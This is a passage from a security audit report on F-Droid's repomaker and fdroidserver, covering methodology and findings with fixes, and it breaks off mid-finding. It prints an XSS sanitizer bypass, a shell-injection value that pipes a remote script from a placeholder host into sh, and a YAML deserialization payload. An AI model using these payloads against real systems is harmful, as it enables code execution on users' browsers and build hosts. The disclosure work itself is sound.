Regular expression pattern should be strengthened to not allow special characters such as semi colon, pipe, quotes etc. to avoid OS command injection attacks.
</div></td></tr></tbody></table></div>
</div>
<a name="dataSummary"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.8</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Charts</div></td></tr></table></div>
<a name="threatlevelpie"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.8.1</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Findings by Threat Level</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><table style="margin-top: 15px;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>See pdf version.</div></td></tr></tbody></table>
</div>
<a name="typepie"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.8.2</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Findings by Type</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><table style="margin-top: 15px;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>See pdf version.</div></td></tr></tbody></table></div></td></tr></tbody></table></div>
</div>
</div>
</div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div style="color: #999999; border-color: #444444; padding-top: 0.7cm; border-top-width: 1px; border-top-style: solid; margin-right: 0cm; padding-right: 2cm;">Executive Summary <span><span>•</span></span></div></div><br><br><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div><a name="methodology"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #e2632a; font-family: Helvetica; font-size: 16pt; margin-bottom: 0.6cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>2</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Methodology</div></td></tr></table></div>
<a name="planning"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>2.1</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Planning</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Our general approach during this code audit was as follows:</div>
<div style="margin-left: 0.2cm; margin-bottom: 5pt; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>1. </div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Scanning</span><div></div>Through the use of vulnerability scanners, all sources were be tested
for vulnerabilities. The result would be analyzed to determine if there any
vulnerabilities that could be exploited to gain access to a target host on a
network.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>2. </div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Grepping</span><div></div>The source code has been grepped for various expressions identifying sources of interest.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>3. </div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Source code reading</span><div></div>The either all of the source code or only portions identified by Scanning and Grepping were being analyzed for possible vulnerabilities.</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Our general approach during this penetration test was as follows:</div>
<div style="margin-left: 0.2cm; margin-bottom: 1.3cm; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>1. </div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Reconnaissance</span><div></div>We attempted to gather as much information as possible about the
target. Reconnaissance can take two forms: active and passive. A
passive attack is always the best starting point as this would normally defeat
intrusion detection systems and other forms of protection, etc., afforded to the
network. This would usually involve trying to discover publicly available
information by utilizing a web browser and visiting newsgroups etc. An active form
would be more intrusive and may show up in audit logs and may take the form of a
social engineering type of attack.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>2. </div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Enumeration</span><div></div>We used varied operating system fingerprinting tools to determine
what hosts are alive on the network and more importantly what services and operating
systems they are running. Research into these services would be carried out to
tailor the test to the discovered services.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>3. </div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Scanning</span><div></div>Through the use of vulnerability scanners, all discovered hosts would be tested
for vulnerabilities. The result would be analyzed to determine if there any
vulnerabilities that could be exploited to gain access to a target host on a
network.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>4. </div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Obtaining Access</span><div></div>Through the use of published exploits or weaknesses found in
applications, operating system and services access would then be attempted. This may
be done surreptitiously or by more brute force methods.</div></td></tr></table></div>
</div>
<a name="riskClassification"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>2.2</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Risk Classification</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Throughout the document, each vulnerability or risk identified has been labeled and
categorized as:</div>
<div style="margin-left: 0.2cm; margin-bottom: 5pt; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Extreme</span><div></div>Extreme risk of security controls being compromised with the possibility
of catastrophic financial/reputational losses occurring as a result.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">High</span><div></div>High risk of security controls being compromised with the potential for
significant financial/reputational losses occurring as a result.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Elevated</span><div></div>Elevated risk of security controls being compromised with the potential
for material financial/reputational losses occurring as a result.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Moderate</span><div></div>Moderate risk of security controls being compromised with the potential
for limited financial/reputational losses occurring as a result.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div><span style="font-weight: bold;">Low</span><div></div>Low risk of security controls being compromised with measurable negative
impacts as a result.</div></td></tr></table></div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Please note that this risk rating system was taken from the Penetration Testing Execution
Standard (PTES). For more information, see:
http:https://www.pentest-standard.org/index.php/Reporting. </div>
</div>
</div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div style="color: #999999; border-color: #444444; padding-top: 0.7cm; border-top-width: 1px; border-top-style: solid; margin-right: 0cm; padding-right: 2cm;">Methodology <span><span>•</span></span></div></div><br><br><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div><a name="recon"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #e2632a; font-family: Helvetica; font-size: 16pt; margin-bottom: 0.6cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>3</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Automated Code Scans</div></td></tr></table></div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Automated code scans were used to obtain preliminary reports, which were analysed for false positive issues. Some of the reported findings are from these scan reports.</div>
<a name="scans"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>3.1</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Automated Scan Tools</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">As part of our static code scanning, we used the following automated
scan tools:</div>
<div style="margin-left: 0.2cm; margin-bottom: 1.3cm; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>bandit – <a href="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/openstack/bandit" style="color: #e2632a;">https://github.com/openstack/bandit</a></div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>safety – <a href="https://pyup.io/safety/" style="color: #e2632a;">https://pyup.io/safety/</a></div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>Visual Code Grepper (VCG) – <a href="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/nccgroup/VCG" style="color: #e2632a;">https://github.com/nccgroup/VCG</a>
</div></td></tr></table></div>
</div>
</div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div style="color: #999999; border-color: #444444; padding-top: 0.7cm; border-top-width: 1px; border-top-style: solid; margin-right: 0cm; padding-right: 2cm;">Automated Code Scans <span><span>•</span></span></div></div><br><br><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div><a name="techSummary"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #e2632a; font-family: Helvetica; font-size: 16pt; margin-bottom: 0.6cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Pentest Technical Summary</div></td></tr></table></div>
<a name="findings"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Findings</div></td></tr></table></div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">We have identified the following issues:</div>
<a name="f8-evasion-of-bleach-sanitizer-in-repomaker"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.1</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-001 — Evasion of Bleach Sanitizer in Repomaker</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-001</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">The user input sanitizer bleach can be circumvented and thus code
can be injected into browsers which display the descriptions of apps.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">in ../code/repomaker/repomaker/utils.py does use bleach for sanitizing untrusted input but can be evaded by the following obfuscations:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;"><a href="javas&#x09;cript:alert(1)">alert</a>
<a href="&#14;javascript:alert(1)">alert</a></div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">High: Code can be executed in the browser showing repomaker and sites which display the descriptions of packages.</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">Upgrade to a version of Bleach which fixes this bug.</div>
</div>
<a name="f14-shell-code-injection-via-malicious-appids-into-fdroidserver"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.2</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-002 — Shell Code Injection Via Malicious Appids Into Fdroidserver</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-002</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">It is possible to craft malicious APK files which contain an appid which is being used as a shell injection, allowing arbitrary code execution.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">dscanner.py</span> runs drozer in a docker container to check an apk using pythons subprocess with <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">shell=True</span> parameter, if the appid can be chosen adversarily it can lead to some fun and calculators.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">copy_to_container = 'docker cp "{0}" {1}:{2}'</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;"> def _copy_to_container(self, src_path, dest_path):
"""
Copies a file (presumed to be an apk) from src_path
to home directory on container.
"""
path = '/home/drozer/{path}.apk'.format(path=dest_path)
command = self.Commands.copy_to_container.format(src_path,
self.container_id,
path)
try:
check_output(command, shell=True)
except CalledProcessError as e:
logging.error(('Command "{command}" failed with '
'error code {code}'.format(command=command,
code=e.returncode)))
raise</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">_copy_to_container()</span> is called in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">_install_apk</span> like this:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">self._copy_to_container(apk_path, app_id)</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">_instal_apk</span> is called from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">perform_drozer_scan()</span> which is called from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">main()</span> like this:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;"> for app_id, app in apps.items():
for build in app.builds:
apks = []
for f in os.listdir(options.repo_path):
n = common.get_release_filename(app, build)
if f == n:
apks.append(f)
for apk in sorted(apks):
apk_path = os.path.join(options.repo_path, apk)
docker.perform_drozer_scan(apk_path, app.id)</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">Either apk_path or app.id can be used for injecting shell codes, for example <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">--help;curl https://host/evil.sh|sh;echo</span>.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">It remains to be clarifified if appids do have any constraints. In this regardwe found the following ways an appid is constructed in fdroidserver:</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">in common.py:545:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">publish_name_regex = re.compile(r"^(.+)_([0-9]+)\.(apk|zip)$")</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">later starting line 561 this regular expression is used like this:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">def publishednameinfo(filename):
filename = os.path.basename(filename)
m = publish_name_regex.match(filename)
try:
result = (m.group(1), m.group(2))
except AttributeError:
raise FDroidException(_("Invalid name for published file: %s") % filename)
return result</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">In metadata.py it seems appid must be a valid filename:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">appid, _ignored = fdroidserver.common.get_extension(os.path.basename(metadatapath))</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">Later in metadata.py appid is taken from manifest.xml:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">appid = manifestroot.attrib['package']</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">In signatures.py appid is resolved by <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">aapt</span> with this call:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">appid, vercode, _ignored = common.get_apk_id_aapt(apkpath)</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">common.get_apk_id_aapt is implemented as follows:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">def get_apk_id_aapt(apkfile):
"""Extrat identification information from APK using aapt.
:param apkfile: path to an APK file.
:returns: triplet (appid, version code, version name)
"""
r = re.compile("package: name='(?P<appid>.*)' versionCode='(?P<vercode>.*)' versionName='(?P<vername>.*)' platformBuildVersionName='.*'")
p = SdkToolsPopen(['aapt', 'dump', 'badging', apkfile], output=False)</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">In update.py an appid is read as a line of text:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">appid = line.rstrip()</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">Considering the above cases of resolving the appid it seems it is possible to construct malicious appids which can be used for arbitrary code execution in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">dscanner.py</span>.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: Arbitrary Code Execution on the fdroid build host.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Validate appids</div></div>
</div>
<a name="f23-code-injection-in-fdroidserver-metadata-yaml-parsing"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.3</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-003 — Code Injection in Fdroidserver Metadata Yaml Parsing</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-003</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Maliciously crafted metadata can be used to run arbitrary code on the fdroidserver host.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">It is possible to craft a malicious metadata file in yaml format, which when its contents are accessed can execute arbitrary code. The affected function is in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">metadata.py:1023</span>:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">def parse_yaml_metadata(mf, app):
yamldata = yaml.load(mf, Loader=YamlLoader)
if yamldata:
app.update(yamldata)
return app</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">A malicious file contains entries like:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">foo: !!python/object/apply:subprocess.check_output ['whoami]</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: can execute malicious code</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Use <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">yaml.safe_load</span> instead.</div></div>
</div>
<a name="f25-infoleak-in-fdroidserver-checkupdates-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.4</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-004 — Infoleak in Fdroidserver Checkupdates.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-004</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Infoleak</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Attacker controlled URLs can be used first to run a regular expression on a local file, then depending on a match of the expression a second URL can be accessed or not. This can be used to leak information from the fdroid host.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">The python module <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">urllib.request</span> supports also <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">file:</span> and custom schemes. This allows us to craft an apk which can test for certain things on the local filesystem, and depending on matches calls a second URL controlled by the attacker.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">excerpt from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">checkupdates.py:50</span>:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;"> urlcode, codeex, urlver, verex = app.UpdateCheckData.split('|')</div></pre>
